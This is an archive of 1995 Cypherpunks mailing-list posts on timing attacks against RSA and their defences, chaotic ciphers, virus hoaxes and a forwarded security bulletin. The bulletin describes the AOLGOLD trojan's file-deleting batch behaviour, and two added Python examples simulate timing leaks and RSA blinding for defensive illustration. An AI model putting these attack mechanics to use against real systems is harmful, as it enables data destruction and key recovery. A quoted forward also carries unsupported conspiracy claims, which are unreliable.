>>A few years back i ran thru a paper emanating
>>from a navy labs researcher (i think the name was Peccora)
>>about using synchronised chaotic signal generators as a
>>signal scrambling/encryption scheme.
>
>I too am interested in this technique.  I may be wrong, but it seems like
>a variation on the one-time pad.  Any comments on this technique (usefulness,
>robustness, etc.)?

1) It's not, repeat NOT, a one-time pad, or anything like one.
Synchronised generators on both ends of a communication are yet another
keyed algorithmic system, and are theoretically breakable; 
one-time pads are theoretically unbreakable (as long as you only use them
once, prevent theft, etc.).  Whether algorithmic systems are breakable 
in practice depends on how good the algorithms are, how good the keys are,
how much attention is paid to cracking them, etc.

2) Almost everything I've heard about chaotic cryptosystems has said
they're not very effective; it's too easy to predict the output.
They're fine random number generators for simulations, but they're
not cryptographically strong.

3) Maybe somebody's done something new and interesting in the field
and hasn't told the general public about it, but if you heard about it
a few years back it's been broken.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 13 Dec 1995 02:06:25 +0800
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512121525.KAA09078@homeport.org>
Message-ID: <9512121726.AA05382@all.net>
MIME-Version: 1.0
Content-Type: text


> Jim Gillogly wrote:
> 
> | > Nathaniel Borenstein <nsb@nsb.fv.com> writes:
> | > Hey, don't go for constant time, that's too hard to get perfect.  Add a
> | > *random* delay.  This particular crypto-flaw is pretty easy to fix. 
> | > (See, I'm not *always* arguing the downside of cryptography!)
> 
> 	Does the delay have to be random, or does the total time for a
> transaction need to be unrelated to the bits in the secret key?
> Assume that the time added is pseudo-random (and confidential).
> Further, for any non-overlapping group of N transactions, the
> distribution of the times fits some predetermined curve, say a bell
> curve.

Random time won't save you - it just increases the noise, thus reducing
the effective bandwidth of the covert channel.  To get the time, I only
need to do enough repetitions of the same computation to eliminate the
effect of the randomness and I have the same resulting information about
the key.

The only way to completely remove covert channels is by making the
measurable time completely independent of the actual time.

One way with the RSA might be to do the encryption with the key and the
inverse of the key (hence all 0s become 1s and 1s become 0s).

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
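
Added example, not part of any post in this thread: a constructed simulation of the point made by Gillogly, Spero and Cohen, that a random delay only adds noise which repetition removes, while padding every reply to one fixed time leaves nothing to measure. All timings (1000 us base, 20 us key-dependent difference, 500 us uniform delay, 1600 us deadline) and all function names are assumptions chosen for illustration.

```python
import random

# Constructed model, not measurements. All constants are assumptions.
BASE_US = 1000.0        # time of the private-key operation when the secret bit is 0
LEAK_US = 20.0          # extra time when the secret bit is 1 (the timing leak)
MAX_JITTER_US = 500.0   # random-delay defence: uniform delay in [0, MAX_JITTER_US]
DEADLINE_US = 1600.0    # fixed-time defence: every reply leaves at this time
THRESHOLD_US = BASE_US + LEAK_US / 2   # midpoint between the two true times


def true_time(secret_bit):
    """Key-dependent running time of the unprotected operation."""
    return BASE_US + (LEAK_US if secret_bit else 0.0)


def observe_random_delay(secret_bit, rng):
    """Random-delay defence: the leak is still present under additive noise."""
    return true_time(secret_bit) + rng.uniform(0.0, MAX_JITTER_US)


def observe_padded(secret_bit, rng):
    """Fixed-time defence: wait until the deadline, whatever the work took."""
    work = true_time(secret_bit)
    pad = DEADLINE_US - work
    if pad < 0:
        raise ValueError("deadline shorter than the slowest operation")
    return work + pad


def estimate_by_mean(samples):
    """Averaging: subtract the known mean of the delay distribution."""
    return sum(samples) / len(samples) - MAX_JITTER_US / 2


def estimate_by_min(samples):
    """A delay is never negative, so the fastest sample approaches the true time."""
    return min(samples)


def guess_bit(samples, estimator):
    """Decide which of the two true times the estimate is closer to."""
    return 1 if estimator(samples) >= THRESHOLD_US else 0


def accuracy(observe, estimator, n_samples, trials=200, seed=1995):
    """Fraction of trials in which an observer recovers the secret bit."""
    rng = random.Random(seed)
    correct = 0
    for _ in range(trials):
        bit = rng.getrandbits(1)
        samples = [observe(bit, rng) for _ in range(n_samples)]
        correct += guess_bit(samples, estimator) == bit
    return correct / trials


if __name__ == "__main__":
    print("samples  random+mean  random+min  padded")
    for n in (1, 50, 2000):
        print(n,
              accuracy(observe_random_delay, estimate_by_mean, n),
              accuracy(observe_random_delay, estimate_by_min, n),
              accuracy(observe_padded, estimate_by_min, n))
```

In this model a single observation is close to a coin toss, 2000 repetitions recover the bit under the random delay, and the padded variant stays at chance however many samples are taken.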




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Wed, 13 Dec 1995 06:04:14 +0800
To: cypherpunks@toad.com
Subject: Wanted: email for Calif senators & representatives
Message-ID: <9511128188.AA818800342@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Can someone send me, or the list, the email addresses for
the California senators and representatives?
                --Bob Baldwin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William J. Halverson" <wjhalv1@PacBell.COM>
Date: Wed, 13 Dec 1995 06:55:49 +0800
To: CYPHERPUNKS@toad.com
Subject: RE: F. Y. I.
Message-ID: <Chameleon.4.01.951212124559.wjhalv1@N93894.snfc370.pacbell.com>
MIME-Version: 1.0
Content-Type: text/plain



                                                            If  the 
>>>>>>>computer contains  a hard  drive, that  will most  likely be 
>>>>>>>destroyed.   If the  program is  not stopped,  the computer's 
>>>>>>>processor will be placed in an nth-complexity infinite binary 
>>>>>>>loop -which can severely damage the processor if left running 
>>>>>>>that way too long.


Hmmmm ... so now we see that using CPUs 'too much' will damage the
processor ...

Hmmm ... I guess it runs out of oil???

Heh heh heh ...

----------------------------------------------------------------
Bill Halverson    Pacific  Bell    Sent 12:45:46 PDT on 12/12/95 
PH 415 542 6564  wjhalv1@pacbell.com            FAX 415 542 4744 
"The views of the author are not those of his employer ... yet."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 13 Dec 1995 04:31:34 +0800
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512121525.KAA09078@homeport.org>
Message-ID: <199512121759.MAA09353@homeport.org>
MIME-Version: 1.0
Content-Type: text



	Nope, I'm wrong, as Fred and Simon point out.  The noise makes
finding the times more difficult by some small factor, nothing more.
I'll stop writing these things in the morning. :)

I wrote:

| 	Does the delay have to be random, or does the total time for a
| transaction need to be unrelated to the bits in the secret key?
| Assume that the time added is pseudo-random (and confidential).
| Further, for any non-overlapping group of N transactions, the
| distribution of the times fits some predetermined curve, say a bell
| curve.
| 
| 	We've added a non random number, but since those numbers end
| up being a curve, it would be difficult to determine which transaction
| got which time added to it.  This resembles the 'make them all a
| constant time', but allows us to send out some in a shorter time than
| the maximum (although most transactions should probably take longer
| than the average.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Wed, 13 Dec 1995 05:47:36 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: EXON
Message-ID: <199512122017.OAA20584@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Mon, 11 Dec 1995 23:10:25 -0800 (PST)
> From:          Rich Graves <llurch@networking.stanford.edu>
> To:            Scott Binkley <SBinkley@atitech.ca>
> Cc:            High Society List <cypherpunks@toad.com>
> Subject:       Re: EXON

> On 11 Dec 1995, Scott Binkley wrote:
> 
> > Could someone please explain to me what this "EXON" thing is??
> 
> A nucleic acid chain (RNA or DNA) is composed of exons, which are 
> "active" sequences of nucleotides that are expressed as polypeptides, and 
> "introns," what is known as "junk DNA." Only about 2% of the 6 billion or 
> so base pairs that make up the human genome are exons.
> 
> (There is some controversy in molecular biology circles as to whether 
> "junk DNA" is really "junk" just because it doesn't build proteins. It 
> could perform a regulatory or "frame-check" function.)

Actually, I think that once the matter is further studied, scientists 
will discover that the "junk DNA" is not junk, but inactive DNA, 
waiting for a "trigger".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 14 Dec 1995 00:10:22 +0800
To: ljo@ausys.se
Subject: Re:  Blinding against Kocher's timing attacks
Message-ID: <199512122127.NAA15216@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: ljo@ausys.se (Johansson Lars)
> Does anyone know whether David Chaum's patent on
> blind digital signatures extends to this application?

I don't think it would.  Chaum's blinding protocol has one major
difference: the blinding factor is applied by a different person than
the one doing the signing.  The purpose of the blinding is different,
too; in Chaum's case the idea is to end up with a signature which is
unknown to the signer, while with Kocher's "defensive blinding" the
signature (or decryption) is an ordinary RSA one, and the blinding is
just done internally by the signer to randomize the timing.

(I gather BTW that the idea of the blinding is for the server to have
pre-chosen a random r and pre-calculated r^d mod n, and then when he is
given c to decrypt he first does c*r mod n and then decrypts this, then
takes the result and divides by r^d.)

It's conceivable that Kocher's blinding would be a patentable technique
in itself, and not impossible that he has already applied for a patent
before publishing.  Probably he would have said so if that were his
intention, though.

Hal

"Blind defensively - watch out for the other guy..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 13 Dec 1995 05:09:37 +0800
To: "David E. Smith" <dsmith@midwest.net>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512121533.JAA21362@cdale1.midwest.net>
Message-ID: <Pine.BSF.3.91.951212132638.29192C-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995, David E. Smith wrote:

> At 04:45 AM 12/12/95 -0500, Black Unicorn wrote:
> 
> >> | PS - I think Paul was a bit surprised when Jim Barksdale pulled
> >> | out his wallet and handed him 10 crisp $100 bills.  :-)
> >> Great.  mention it where the IRS is sure to be listening.  :)
> >Why would the IRS listen?  Everyone knows the tax system is voluntary.
> 
> Do you know something I don't?  :)
> Would you mind sharing?  :)

Try misc.taxes for the tax protestor arguments (which fail of course).  
But by asking, you may be on "their" list (and I don't mean a list held 
by tax protestors but by a TLA).  And if you're reallllllly bad about it, 
one of my buddies may decide to invite you in ...

EBD


> 
> Dave
> ----- David E. Smith, c/o Southeast Missouri State University
> 1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 13 Dec 1995 05:26:20 +0800
To: cypherpunks@toad.com
Subject: (dcsb) CIS SEMINAR--December 15--Manasse, Micali, Rivest, Shamir--2:00pm
Message-ID: <v02120d01acf389509e4c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: lethin@ai.mit.edu (Rich Lethin)
Date: Tue, 12 Dec 1995 14:12:26 -0500
To: bsdc@ai.mit.edu
Subject: [joanne@theory.lcs.mit.edu: CIS SEMINAR--December 15--Manasse,
Micali, Rivest, Shamir--2:00pm]
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: lethin@ai.mit.edu (Rich Lethin)


Seminar at MIT.

Return-Path: <joanne@theory.lcs.mit.edu>
From: joanne@theory.lcs.mit.edu (Joanne Talbot)
Date: Tue, 12 Dec 95 12:38:38 EST
To: theory-seminars@theory.lcs.mit.edu
Reply-To: theory-seminars-request@theory.lcs.mit.edu
Subject: CIS SEMINAR--December 15--Manasse, Micali, Rivest, Shamir--2:00pm

**Of interest.

                         CIS-SEMINAR

Title:          Micropayment schemes, light-weight signatures, and
                        public-key certification
Speakers:       Mark Manasse, Ron Rivest, Adi Shamir, and Silvio Micali
Time:           2:00-3:30 Friday, December 15th, 1995
Where:          Room NE43-518, 545 Technology Square

Abstract:

We present four short talks on related subject matter:

(1) Mark Manasse will present his micropayment scheme "Millicent".
(2) Ron Rivest will present the "PayWord" micropayment scheme.
(3) Adi Shamir will present the "MicroMint" micropayment scheme.
(4) Silvio Micali will present an enhanced certificate revocation system.

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 13 Dec 1995 10:48:18 +0800
To: cypherpunks@toad.com
Subject: Spotty c'punks service due to network outages
Message-ID: <9512122235.AA14507@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Our network service is going up and down, probably due to the storms
in San Francisco.  If you see delays, that's the reason why.  As far
as I know, NSA has not figured out how to control the weather, so it's
not their fault :-).

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Webmaster@fornits.com (Ginger Warbis)
Date: Wed, 13 Dec 1995 05:27:23 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape announces position against GAK
Message-ID: <199512121939.OAA17633@www2.clever.net>
MIME-Version: 1.0
Content-Type: text/plain


>On Fri, 8 Dec 1995, James A. Donald wrote:
>
>> At 04:27 AM 12/9/95 -0800, Timothy C. May wrote:
>> >Credit where credit is due.
>> >
>> >I for one am satisfied--and even pleased--with the Netscape position on GAK.
>> 
>> Well I for one, am seriously unsatisfied, but it is not so bad as
>> to merit a campaign against Netscape.
>
>I think it's a good start.  I would like to see how much effort after 
>this really pans out.  Doesn't take much to put out a policy statement.  
>Takes a lot to follow it through.
>

Greetings all. May I also point out that the power of self government is at
least as effective when rewarding good behavior as when punishing bad. You
guys are the experts in this particular political niche, but from the
viewpoint of a more or less innocent stander-by, the statement sounded to me
like "OK, we went, we listened, they were full of shit, the line is HERE."
and I'm quite satisfied.
--
Bill & or Ginger Warbis
WebMaster@Fornits.com - http://fornits.com/
"The more corrupt the state, the more numerous the laws."
Tacitus, Roman senator and historian (A.D. c.56- c.115)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 13 Dec 1995 05:44:34 +0800
To: ecarp@netcom.com
Subject: Re: Jim Quinn interview of James Norman (edited)
In-Reply-To: <199512120247.SAA12705@nova.unix.portal.com>
Message-ID: <199512121953.OAA03720@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



According to the headers, you, Mr. Carp, forwarded this to
Cypherpunks, when it was obviously available to those that wanted to
read it on a variety of other mailing lists.

Please don't continue doing this.

Jon Roland writes:
> The following is a Radio Interview between James Norman, 
> formerly Senior Editor of Forbes Magazine and now with Media 
> Bypass Magazine and Jim Quinn, DJ of WRRK 96.9 FM in Pittsburgh. 
> In this interview from December 7th, they discuss issues of 
> national importance and STUNNING IMPACT. Essentially they give 
> out the reason for Vincent Foster's Death, and the fact that 
> the "resignations" of the Congresspersons are NOT for policy 
> reasons but because they have been caught with millions in 
> corrupt funds in Swiss Banks. Read this to learn what the 
> "mainstream media" doesn't ever tell you... 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Wed, 13 Dec 1995 17:31:54 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512121525.KAA09078@homeport.org>
Message-ID: <30CE08D2.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> 
> One way with the RSA might be to do the encryption with the key and
> the inverse of the key (hence all 0s become 1s and 1s become 0s).

Nope, this doesn't work.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Wed, 13 Dec 1995 06:12:22 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: EXON [Noise]
In-Reply-To: <199512122017.OAA20584@khijol>
Message-ID: <Pine.A32.3.91.951212150845.27478H-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> > (There is some controversy in molecular biology circles as to whether 
> > "junk DNA" is really "junk" just because it doesn't build proteins. It 
> > could perform a regulatory or "frame-check" function.)
> 
> Actually, I think that once the matter is further studied, scientists 
> will discover that the "junk DNA" is not junk, but inactive DNA, 
> waiting for a "trigger".

Sorta like that episode of Star Trek where all this DNA gets combined 
into a 3-D Quicktime movie?

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Wed, 13 Dec 1995 05:49:29 +0800
To: WheatonB@603cs.croughton.af.mil
Subject: Re: F. Y. I.
In-Reply-To: <9511128188.AA818815409@603cs.croughton.af.mil>
Message-ID: <Pine.3.89.9512121515.A16552-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


Good Times is an old hoax. Ignore it.

AOLGOLD referenced by another poster is real but kind of dumb.

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Wed, 13 Dec 1995 06:05:04 +0800
To: cypherpunks@toad.com
Subject: Re: <None>
In-Reply-To: <E243943A01502C79@-SMF->
Message-ID: <Pine.LNX.3.91.951212160331.216A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 11 Dec 1995, Scott Binkley wrote:

> A long time ago, I read about a program that would take a picture, and
> replace the LSB of every pixel in the picture with your message.  I'm
> wondering, is the source code for this program available anywhere on the
> net???
> 
> 

The program is at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/steganography/jsteg/.  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM3uxbZc+sv5siulAQGL+QP9FDfd7ftarbT0znpmefH52KP9fUmSbomr
QhTTnTwAbzul6F1RGFomSMfpev5BD6+WaaoGuLarbLP6sSeeGpHNWSVBMfsBiay1
7yz0P5p8w6nv62E/3jG3SPtdzehk5x1yij1wzDibXHcI3NKtkwatofLzuMwigs0R
HRzRWxwQPsE=
=PBrg
-----END PGP SIGNATURE-----


finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jadestar@netcom.com (JaDe)
Date: Wed, 13 Dec 1995 10:20:22 +0800
To: WheatonB@603cs.croughton.af.mil
Subject: Re: F. Y. I.
In-Reply-To: <9511128188.AA818815409@603cs.croughton.af.mil>
Message-ID: <199512130009.QAA16527@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>      To all.  This is something I received from a fellow Internet user in 
>      the States.  I don't know where he got this info, but I thought we may 
>      all benefit from this warning.
>      
>      SrA Lounsbury sends...
> 
> >>>>>>SUBJECT:  VIRUSES--IMPORTANT PLEASE READ IMMEDIATELY 
> >>>>>>line "Good  Times",   DO NOT  read  the  message,  DELETE  it 

	I've been employed by two of the largest and most well-known
	Anti-Virus software companies in the world (Symantec and now
	McAfee).

	I've supported a wide variety of anti-virus products.

	I can assure you that this is a hoax.  There is currently 
	no known mechanism by which an e-mail message could "infect"
	and "propagate" independent of OS and MUA.  In other words
	it would require a specific combination of operating system
	and platform and/or a specific mail reading program 
	to transparently execute code (macros whatever) inside of a
	mail message.

	Java, LiveScript, and Microsoft's transparent MSN hooks
	could allow these sorts of things in the future (through
	suitably *bad* client software).  Also I've heard that 
	the e-mail package included with WordPerfect Office can
	execute some binary attachments, automatically.

	Other than those two exceptions I know of no way that this
	would be feasible.

	On comp.virus (or was it alt.comp.virus??) there was considerable
	(and heated) debate about the feasibility (and possible 
	*desirability <g>) of a trojan horse that would be specific to
	a client (like AOL's proprietary access software) and would
	pipe in some data to exploit some as yet undiscovered bug
	(like the famous fingerd buffer overflow) to force execution
	of CPU specific machine code.

	In any event these would not be "viruses" in the traditional
	computer sense of the term.  Virus researchers naturally have
	to distinguish between worms, logic bombs, trojan horses,
	droppers, and various types of virus.  There is considerable
	literature on these distinctions (which I have neither the
	time nor the expertise to attempt to duplicate here).

		(and there was much rejoicing).

	All of this has little to do with cryptography.  

	The cryptography used in computer viruses is generally not very
	sophisticated.  The primary constraints are compactness of
	algorithm and convenience of the implementation with respect to
	a given processor.  The only purpose is to obfuscate the code --
	try to limit the efficiency or effectiveness of signature based
	scanning engines.  Mostly they use self-modifying code loops
	with XOR's and simple ADD's and SUB's.   I heard of one that
	PUSHed all its code onto the stack and then did a simple FAR
	JMP to it (apparently quite compact).

	Finally I'd like to recommend that people please restrain
	themselves from forwarding press releases from various	
	sources to other mailing lists that "might be interested."

	Most of us are big boys and girls.  If our interest is
	sufficiently broad, we'll go subscribe to those other lists
	or newsgroups.

	If you insist on referring to things from other sources --
	perhaps a short query (like "Say does anyone here think the
	'Good Times' virus has anything to do with cryptography?"
	and "Well, if you're interested you can find out more about it
	on foo -- or ask and I'll forward a copy") will be more 
	conservative of our time and bandwidth.

	(Now y'all can flame me for wasting this much on a largely
	off-topic response -- but please feel free to direct those
	flames to /dev/null or to *just me*).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljo@ausys.se (Johansson Lars)
Date: Wed, 13 Dec 1995 01:26:07 +0800
To: cypherpunks@toad.com
Subject: Blinding against Kocher's timing attacks
Message-ID: <95Dec12.160243gmt+0100.53783@void.ausys.se>
MIME-Version: 1.0
Content-Type: text/plain




Ron Rivest wrote (at sci.crypt):
>The simplest way to defeat Kocher's timing attack is to ensure that the
>cryptographic computations take an amount of time that does not depend on
>the data being operated on.  For example, for RSA it suffices to ensure that
>a modular multiplication always takes the same amount of time, independent
>of the operands.
>
>A second way to defeat Kocher's attack is to use blinding: you "blind" the
>data beforehand, perform the cryptographic computation, and then unblind
>afterwards.  For RSA, this is quite simple to do.  (The blinding and
>unblinding operations still need to take a fixed amount of time.) This
>doesn't give a fixed overall computation time, but the computation time is
>then a random variable that is independent of the operands.

Does anyone know whether David Chaum's patent on
blind digital signatures extends to this application?

Kind regards,
/Lars Johansson

ljo@ausys.se
http://www.ausys.se/defaulte.htm
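
The blinding that Rivest's quoted post describes, in the concrete form Hal Finney spells out in his reply elsewhere in this archive (pre-choose r, pre-compute r^d mod n, decrypt c*r mod n, divide by r^d), as an added example that is not part of either post. The toy key, the function names and the squaring refresh between requests are assumptions made for illustration.

```python
import math
import secrets

# Constructed toy RSA key built from two Mersenne primes; far too small
# for real use and chosen only so the example runs offline.
P = 2**31 - 1
Q = 2**61 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # private exponent (Python 3.8+)


def new_blinding_pair(n, d):
    """Pre-choose a random r and pre-compute (r^d)^-1 mod n.

    This is the expensive step, done ahead of time and not per request.
    """
    while True:
        r = secrets.randbelow(n - 2) + 2       # 2 <= r <= n-1
        if math.gcd(r, n) == 1:                # r must be invertible mod n
            break
    unblind = pow(pow(r, d, n), -1, n)
    return r, unblind


def refresh_pair(pair, n):
    """Cheap per-request update (an assumption, not from the posts):
    squaring both halves gives (r^2, ((r^2)^d)^-1), again a valid pair."""
    r, unblind = pair
    return (r * r) % n, (unblind * unblind) % n


def blinded_private_op(c, d, n, pair):
    """Compute c^d mod n without ever exponentiating c itself.

    Returns (result, value_that_was_exponentiated) so the caller can see
    that the secret-dependent step ran on a randomized operand.
    Python integers are not constant-time; a real implementation also
    has to make the two multiplications below take a fixed time.
    """
    r, unblind = pair
    blinded = (c * r) % n            # step 1: c*r mod n
    s = pow(blinded, d, n)           # step 2: (c*r)^d = c^d * r^d mod n
    return (s * unblind) % n, blinded  # step 3: divide by r^d


def demo():
    """Decrypt the same ciphertext twice under two different blinding pairs."""
    m = 0x1234567890ABCDEF           # constructed message, m < N
    c = pow(m, E, N)
    pair1 = new_blinding_pair(N, D)
    pair2 = refresh_pair(pair1, N)
    out1, seen1 = blinded_private_op(c, D, N, pair1)
    out2, seen2 = blinded_private_op(c, D, N, pair2)
    return m, c, out1, out2, seen1, seen2


if __name__ == "__main__":
    m, c, out1, out2, seen1, seen2 = demo()
    print("plaintext recovered both times:", out1 == m and out2 == m)
    print("operand exponentiated, request 1:", hex(seen1))
    print("operand exponentiated, request 2:", hex(seen2))
```

Both requests return the same plaintext, but the private-key exponentiation runs on a different operand each time, so its timing is not tied to the ciphertext the requester supplied.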







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WheatonB@603cs.croughton.af.mil
Date: Wed, 13 Dec 1995 01:46:03 +0800
To: CYPHERPUNKS@toad.com
Subject: AOGOLD Trojan Program
Message-ID: <9511128188.AA818815153@603cs.croughton.af.mil>
MIME-Version: 1.0
Content-Type: text/plain


     FYI.  Thanks.
     
     ... Kev
     

Kevin P. Knox, SSgt, USAF

Systems Administrator, IP Network Manager
Novell Certified NetWare Engineer

Royal Air Force Croughton, United Kingdom
Near Brackley, Northamptonshire

My PGP public key can be obtained via anonymous FTP from
nsc.croughton.af.mil (131.56.128.5)


     
     
     From:             pch@assist.mil
     Subject:          ASSIST 95-46, AOLGOLD Trojan Program.
     To:               assist-bulletin@assist.mil
     Date sent:        Mon, 4 Dec 1995 16:06:54 -0500 (EST)
     Copies to:        assist@assist.mil
     
     
     -----BEGIN PGP SIGNED MESSAGE-----
     
     <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
         
               Automated Systems Security Incident Support Team
                                                     _____
                  ___   ___  _____   ___  _____     |     /
           /\    /   \ /   \   |    /   \   |       |    / Integritas
          /  \   \___  \___    |    \___    |       |   <      et
         /____\      \     \   |        \   |       |    \ Celeritas
        /      \ \___/ \___/ __|__  \___/   |       |_____\
     <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
         
                            Bulletin  95-46
      
            Release date: 4 December, 1995, 4:00 PM EST (GMT -5)
     
     SUBJECT: AOLGOLD Trojan Program.
     
     SUMMARY:  A trojan program called AOLGOLD.ZIP that deletes c: 
     drive files when executed is being distributed around America Online 
     and other networks.
     
     BACKGROUND: The AOLGOLD Trojan program was recently discovered on 
     America Online (AOL).  Notice about the Trojan has been circulated 
     to all America Online subscribers.  An e-mail message that contained
     an attached archive file named AOLGOLD.ZIP was circulated on AOL.
     A README file that is in the archive describes the fictitious AOLGOLD 
     as a new and improved interface for the AOL online service.  Reading
     or downloading the included file will not damage your system; the
     trojaned program must be executed for damage to occur.
     
     If you unzip the archive, you get two files: INSTALL.EXE and 
     README.TXT.  The README.TXT file again describes AOLGOLD as a new 
     and improved interface to the AOL online service.  The INSTALL.EXE 
     program is a self-extracting ZIP archive.  When you run the install 
     program, it extracts 18 files onto your hard drive:
     MACROS.DRV
     VIDEO.DRV
     INSTALL.BAT
     ADRIVE.RPT
     SUSPEND.DRV
     ANNOY.COM
     MACRO.COM
     SP-NET.COM
     SP-WIN.COM
     MEMBRINF.COM
     DEVICE.COM
     TEXTMAP.COM
     HOST.COM
     REP.COM
     EMS2EXT.SYS
     EMS.COM
     EMS.SYS
     README.TXT
     
     The file list includes another README.TXT file.  If you examine the 
     new README.TXT file, it starts out with "Ever wanted the Powers of 
     a Guide" and continues with some crude language.  The README.TXT 
     file indicates that the included program is a guide program that 
     can be used to kick other people off of AOL.  If you stop at this 
     point and do nothing but examine the unzipped files with the TYPE 
     command, your machine will not be damaged.  The following three 
     files contain the Trojan program: 
     MACROS.DRV
     VIDEO.DRV
     INSTALL.BAT
     
     The rest of the files included in the archive appear to have been 
     chosen at random and included to simply fill up the archive and 
     make it look official.  The Trojan program is started by running 
     the INSTALL.BAT file.  The INSTALL.BAT file is a simple batch 
     file that renames the VIDEO.DRV file to VIRUS.BAT and then runs 
     it.  VIDEO.DRV is an amateurish DOS batch file that starts 
     deleting the contents of several critical directories on your C: 
     drive, including:
     c:\
     c:\dos
     c:\windows
     c:\windows\system
     c:\qemm
     c:\stacker
     c:\norton
     
     It also deletes the contents of several other directories, including 
     those for several online services and games, such as:
     c:\aol20
     c:\prodigy
     c:\aol25
     c:\mmp169
     c:\cserve
     c:\doom
     c:\wolf3d
     
     When the batch file completes, it prints a crude message on the 
     screen and attempts to run a program named DoomDay.EXE.  Bugs in the 
     batch file prevent the DOOMDAY.EXE program from running.  Other bugs 
     in the file cause it to delete itself if it is run from any drive but 
     the C: drive.
     
     IMPACT: When the INSTALL.EXE program is executed, files on the
     user's c: drive are deleted.
     
     RECOMMENDED SOLUTIONS: NOTE: Do not copy any files onto your hard 
